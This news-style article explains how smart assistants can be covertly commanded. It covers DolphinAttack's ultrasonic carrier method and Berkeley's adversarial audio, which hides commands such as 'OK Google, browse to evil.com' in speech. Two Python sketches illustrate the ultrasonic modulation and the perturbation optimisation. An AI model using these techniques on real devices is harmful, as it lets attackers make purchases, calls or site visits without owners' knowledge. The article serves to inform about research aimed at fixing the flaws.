Your Smart Assistant Can Take Commands Inaudible to the Human Ear


In university labs, researchers have been quietly activating the artificial intelligence systems on smartphones and smart speakers with commands their owners never hear. Major smart speaker manufacturers like Amazon, Google and Apple say they have safeguards in place to prevent their assistants from being hijacked. It turns out, though, that anything that can be spoken to is also susceptible to hidden, inaudible commands.

The microphones and software that run assistants such as Alexa and Google Now can pick up frequencies above 20 kHz, the upper limit of the audible range for human ears.

Now the technology is racing even further ahead of the law.

Researchers in China demonstrated last year that ultrasonic transmissions could trigger popular voice assistants such as Siri or Alexa, in a method known as 'DolphinAttack'.
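DolphinAttack works by riding an ordinary voice command on an ultrasonic carrier; nonlinearities in a microphone's circuitry demodulate the signal back into the audible band, so the assistant hears a command that a bystander never does. As a rough illustration of that principle only, the following Python sketch amplitude-modulates a recorded command onto a 25 kHz carrier. The carrier frequency, sample rates and file names here are assumptions chosen for demonstration, not the researchers' actual setup.

```python
# Rough illustration of the principle behind DolphinAttack: amplitude-
# modulate a recorded voice command onto an ultrasonic carrier. The
# carrier frequency, sample rate, and file names below are assumptions
# chosen for demonstration, not the researchers' actual parameters.
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000   # above the ~20 kHz ceiling of human hearing
OUTPUT_RATE = 96_000  # output hardware must support ultrasonic playback

rate, voice = wavfile.read("command.wav")  # hypothetical recorded command
if voice.ndim > 1:                         # collapse stereo to mono
    voice = voice[:, 0]
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))             # normalise to [-1, 1]

# Naively resample the baseband command up to the high output rate.
t_old = np.arange(len(voice)) / rate
t_new = np.arange(0.0, t_old[-1], 1.0 / OUTPUT_RATE)
baseband = np.interp(t_new, t_old, voice)

# Standard amplitude modulation: carrier * (1 + m * signal). Nonlinearity
# in a microphone can demodulate this back into the audible band, so the
# assistant "hears" the command while a person hears nothing.
m = 0.8                                    # modulation depth
carrier = np.cos(2.0 * np.pi * CARRIER_HZ * t_new)
modulated = carrier * (1.0 + m * baseband)
modulated /= np.max(np.abs(modulated))

wavfile.write("ultrasonic.wav", OUTPUT_RATE,
              (modulated * 32767).astype(np.int16))
```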

The latest research shows that attackers could exploit these vulnerabilities to issue inaudible commands at frequencies beyond human hearing, launching attacks such as sending messages and making purchases, all without the user realizing it. DolphinAttack even muted the target phone before issuing its inaudible commands, so the owner wouldn't hear the device's responses. While the commands couldn't penetrate walls, they could control smart devices through open windows from outside a building.

Researchers at the University of California, Berkeley, have now claimed in a research paper that hidden commands can be embedded into music tracks or spoken text. The group provided samples of songs in which voice commands had been embedded to make digital assistants do specific things, including visiting websites, turning on the Global Positioning System, and making phone calls. They were able to hide the command 'OK Google, browse to evil.com' in a recording of the spoken sentence, 'Without the dataset, the article is useless.' Humans cannot detect the hidden command.

What these studies demonstrate is that it is possible to manipulate speech recognition systems by making minute, carefully crafted changes to speech or other audio files.
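The Berkeley work treats this as an optimization problem: search for the smallest perturbation to a waveform that makes the model transcribe an attacker-chosen phrase. As a minimal sketch of that general idea only, the following Python code assumes a differentiable speech-to-text model that returns per-frame logits and uses a CTC loss; the function name, model interface and parameters are all placeholders, not the researchers' actual code.

```python
# Rough sketch of the optimisation behind hidden-command audio: find a
# small perturbation "delta" so a speech-to-text model transcribes an
# attacker-chosen phrase while the waveform still sounds unchanged.
# The model, loss setup, and every name here are placeholders, not the
# Berkeley team's actual code.
import torch

def craft_hidden_command(model, audio, target, steps=1000,
                         lr=1e-3, epsilon=0.01):
    """audio: waveform tensor scaled to [-1, 1] (batch of one assumed);
    target: integer-encoded target transcript, shape (S,);
    model: assumed differentiable, returning (time, 1, vocab) logits."""
    delta = torch.zeros_like(audio, requires_grad=True)
    opt = torch.optim.Adam([delta], lr=lr)
    ctc = torch.nn.CTCLoss()  # a common loss for speech recognition

    for _ in range(steps):
        adv = torch.clamp(audio + delta, -1.0, 1.0)
        log_probs = model(adv).log_softmax(dim=-1)
        input_len = torch.tensor([log_probs.shape[0]])
        target_len = torch.tensor([target.shape[0]])
        loss = ctc(log_probs, target.unsqueeze(0), input_len, target_len)

        opt.zero_grad()
        loss.backward()
        opt.step()
        with torch.no_grad():             # keep the change inaudibly small
            delta.clamp_(-epsilon, epsilon)

    return torch.clamp(audio + delta, -1.0, 1.0).detach()
```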

Over the past two years, researchers in university labs have worked on hidden commands that Siri, Alexa and Google Assistant will pick up but humans will not. How device makers respond will differ, especially as they balance security against ease of use.

Nicholas Carlini, who co-led the Berkeley study, said he was confident that in time he and his colleagues could mount successful adversarial attacks against any smart device system on the market.

'We want to demonstrate that it's possible, and then hope that other people will say, OK, this is possible, now let's try and fix it,' Mr Carlini told the Times.
